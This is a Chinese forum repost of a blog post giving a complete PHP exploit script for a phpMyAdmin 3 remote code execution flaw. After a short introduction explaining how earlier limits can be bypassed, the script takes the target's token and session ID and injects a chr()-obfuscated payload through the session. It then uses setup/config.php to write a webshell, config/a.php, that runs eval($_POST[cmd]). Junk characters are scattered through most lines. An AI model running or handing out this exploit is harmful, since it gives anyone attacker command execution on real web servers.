最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
! P1 Q- f5 k- n& a8 X' Z- J6 n. E+ @/ W5 w7 E+ c6 P* e5 E( R
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
' w0 W% l0 Z/ _0 w5 h* S+ R5 j; R0 Z; s" @# L
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
" `0 G) h; g" n7 n% w( X" E* m一是session.auto_start = 1;
/ L7 F8 S+ K1 c# e5 f二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
( u+ R4 l6 h. O' d8 q8 G当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
4 `" p! M% y+ k# J" V
3 H8 L$ n# e2 M1 R( |, @2 Z在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
( }' I2 h0 g) k/ c% n4 s( r
! `+ D4 ^" X) i8 U1 R于是写了这个php版本的exp,代码如下:
# q& s# K7 T' `, |7 g% Q7 L/ s0 E
( K z& ]7 q% b- j#!/usr/bin/php8 S9 c! D7 t+ M& C" ^# F9 c
<?php
9 X8 Z# T" x+ N( e* c Mprint_r('
( ^* w- _+ Z. M+---------------------------------------------------------------------------+% r- j- @& C7 k, B/ x
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]* U# ?5 @4 o9 L# |% H
by oldjun(www.oldjun.com); C+ j* [/ }9 p8 h) F
welcome to www.t00ls.net; L' R- l4 I; q8 u
mail: oldjun@gmail.com" M# M. U: d* }3 D
Assigned CVE id: CVE-2011-25056 E+ e) q+ }" {+ a
+---------------------------------------------------------------------------+1 B" Q' u2 Y# g" B' Q
');* @6 P) ]1 S. K4 |- T: s& M
6 @! K- e, I- }( z" V9 p" {/**
: i7 J' | T3 k8 x5 ~1 S * working when the directory:"config" exists and is writeable.. \1 {! M: S( F6 B6 B. E
**/
* s- j" P4 k/ m; {4 L+ w, K
* ?' J/ t, U6 h- L# E0 p) Q/ O& Yif ($argc < 3) {- e/ n% ^; f: h! h1 ]6 {
print_r('
8 Y9 d$ i1 R& ~8 H: ? j3 T' h7 m; l6 n+---------------------------------------------------------------------------+8 O. y! j4 m/ R! L6 o2 V: C8 W
Usage: php '.$argv[0].' host path
; I3 [8 }/ u- ~host: target server (ip/hostname)
' I7 E4 O* @* O) ]$ _3 q8 _path: path to pma3: ~$ b- W! C( B% U3 d5 K; C4 y$ F. f
Example:
0 f* n* G; i! x) iphp '.$argv[0].' localhost /pma/
8 q: K4 g8 H3 P7 \, M6 j+---------------------------------------------------------------------------+- E. P. U3 M: Q' e
');
g0 I% N, F' }9 { exit;
4 W' L7 j9 \* @) v: L% H2 @0 ^}: @: N! {* @8 E, r) R0 Y# l
. }; m5 Z* x5 Z' ^
$host = $argv[1];
7 x _' p3 `$ n% V4 ^& j$path = $argv[2];5 A0 M% U! V S( l, {* a' ?
8 b+ }6 Y0 b7 s, ~- \
/**
2 X6 z" z. R( U7 Q/ A2 w * Try to determine if the directory:"config" exists
) r" T' b Y: r. H**/8 ~% \! W+ S* I2 X
echo "[+] Try to determine if the directory:config exists....\n";0 G+ b. @, k. g0 {' d5 p5 x" ]
$returnstr=php_request('config/');
; d& z/ h3 l S8 |/ Eif(strpos($returnstr,'404')){ B% h6 } h8 n+ j2 x. y/ `+ y
exit("[-] Exploit Failed! The directory:config do not exists!\n");+ B5 G- G' t( m5 y }4 L
}
# k& i4 @8 E& _; {# U6 J( }* t* v J7 T" _0 k7 S, T" j: {& _1 z
/**
3 [0 \. Q* |0 j" |) g * Try to get token and sessionid0 o+ o/ X# I' P6 v. H# ?+ A5 f
**/
: Y" u, I( [, v* K% Y. Gecho "[+] Try to get token and sessionid....\n";
) w5 ~+ J( p0 A8 \9 d$ j8 a( t$result=php_request('index.php');) Y6 H- D" I9 P& J4 G1 c: b9 o
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp); D' O0 [$ j- z2 E
$token=$resp[3];
6 v2 Q- C3 G7 P7 C" ]0 H" N$sessionid=$resp[1];
! a P4 |1 p, J6 S- |+ v6 ^+ Gif($token && $sessionid){
6 F t: l" y* m& W& H echo "[+] token token\n";( k3 e6 ~3 q' S, z6 v8 D$ ?
echo "[+] Session IDsessionid\n";# J4 \, e- v2 i' l7 z! s
}else{( ?2 [' Y: c; h3 i
exit("[-] Can't get token and Session ID,Exploit Failed!\n");
$ _- [3 i. I9 s: g, K}9 p: B, b& B' S3 U" ^( z! F
. Z$ Z6 T8 ^9 v$ p/**
4 V2 l' \4 W; F( Q! q9 t* r/ f * Try to insert shell into session
, N: k# n0 K$ b0 p) X' Q0 r' a**/$ J# P6 h- X# ?+ C
echo "[+] Try to insert shell into session....\n"; @8 |. i6 ~& i( {, u( s E1 S
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
2 ~# b4 V: U$ O; [; {. d& g% m" h# ^0 N4 e( w* k( Q; G
/**, W+ `' k D, ~8 N
* Try to create webshell
9 f9 }7 Z+ H: u! ^0 c: H* [6 M' [) y**/
3 T* }2 I. I p. h, ], i; xecho "[+] Try to create webshell....\n";
4 O9 N1 i \8 {# F1 Nphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
/ \' G, O ?9 q) }. j: F- G5 g/**/ T7 q- q4 K0 d5 S2 P V0 |- V
* Try to check if the webshell was created successfully" ]; n# z: A8 i4 t$ C& M
**/
) y) k3 L0 n1 i2 c6 [echo "[+] Try to check if the webshell was created successfully....\n";# e& x: V, g5 d
$content=php_request('config/config.inc.php');$ k9 ]3 s; N( B! X+ X: x" ~ H
if(strpos($content,'t00ls')){3 X" v4 e0 n& O0 |
echo "[+] Congratulations! Expoilt successfully....\n";6 F5 k4 q0 v( f' k9 y% K& {9 B) _2 Y$ y
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
$ |4 N O& `( w1 t. }) _}else{
/ a3 B# V( G9 O- t7 Q exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");) t8 v, J+ z' a9 s G8 T
}) s5 \8 R8 d! p& `1 h
$ x `, }2 A- Sfunction php_request($url,$data='',$cookie=''){% ~# v n2 t S! `
global $host, $path;
, E0 z2 H; n6 W8 ?- }. u. Q8 K ) r. W) w- ?1 ?! b7 F
$method=$data?'POST':'GET';
# J9 c0 J: q# M) l0 r' C/ B/ o # Y; O' Q: Y8 q8 C$ T
$packet = $method." ".$path.$url." HTTP/1.1\r\n";9 d' ]& \( S! K1 N
$packet .= "Accept: */*\r\n";
$ V: {7 A; @+ I% b $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";# x: o! f0 U2 T3 S$ d( f
$packet .= "Host: $host\r\n";
+ H& a9 i$ |- p0 Y5 y* E0 b1 p $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";, q* b4 x6 ]7 A) g4 b7 U ?# t
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
8 c7 `) T6 x9 M# t* P $packet .= $cookie?"Cookie: $cookie\r\n":"";8 r. | B+ k! U$ M5 q/ V5 _
$packet .= "Connection: Close\r\n\r\n";6 A0 C8 L( U. G2 Y
$packet .= $data?$data:"";
& g5 R& d9 N A" k* d+ ?4 u7 T0 d: B4 A( b$ U4 y
$fp = fsockopen(gethostbyname($host), 80);* B* c; x: s! g. v1 y+ Z
if (!$fp) {7 K" J3 p' N) _. ?8 n- W' Y4 n
echo 'No response from '.$host; die;( L1 M: p8 ^5 m+ \9 W ]8 Q
}, R6 L7 v# z2 W% x
fputs($fp, $packet);
) G, Y q0 }3 s! s2 m; N0 K P: F% L, B" j% |
$resp = '';
' `+ l8 Y Z6 o* o+ Z: Z: }# B/ i% h/ e
while ($fp && !feof($fp)). b- W$ i7 a/ H; o* S
$resp .= fread($fp, 1024);
1 W8 _: K% r, q' c* _. m/ C- d% q+ t H5 i' ~- z2 S
return $resp;
6 ~0 ~* Y! w& B; a; \}
u: v# |5 M F. a8 n % ]* H, I1 x% Z
?> 1 V E/ y6 O+ N( k+ J+ ~' ?1 I) l
. |
发表于 2013-2-21 09:13:03
收藏
支持
反对